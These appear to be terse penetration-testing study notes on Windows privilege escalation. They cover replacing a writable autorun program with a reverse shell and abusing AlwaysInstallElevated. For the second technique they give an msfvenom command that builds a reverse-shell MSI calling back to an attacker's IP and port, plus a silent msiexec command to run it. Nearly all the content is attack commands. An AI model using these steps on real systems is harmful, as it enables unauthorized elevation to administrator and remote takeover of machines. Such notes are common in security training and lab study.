1. Use winPEAS or query the registry to enumerate applications
.\winPEASany.exe quiet applicationsinfo

# or 

req query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Look for autorun applications which anyone can write to. 2. Confirm the permissions (which let you write) using accesschk:

.\accesschk.exe /accepteula -wvu <program>
  1. Make a backup of the original executable, then override it with your revshell
  2. Start a listener on Kali
  3. Restart the Windows


  1. Use winPEAS to enumerate applications
.\winPEASany.exe quiet windowscreds

Check that both AlwaysInstallElevated are set to 1. 2. Create a new revshell with .msi format:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f msi -o revshell.msi
  1. Start a listener on Kali
  2. Copy the revshell to windows and execute it:
msiexec /quiet /qn /i revshell.msi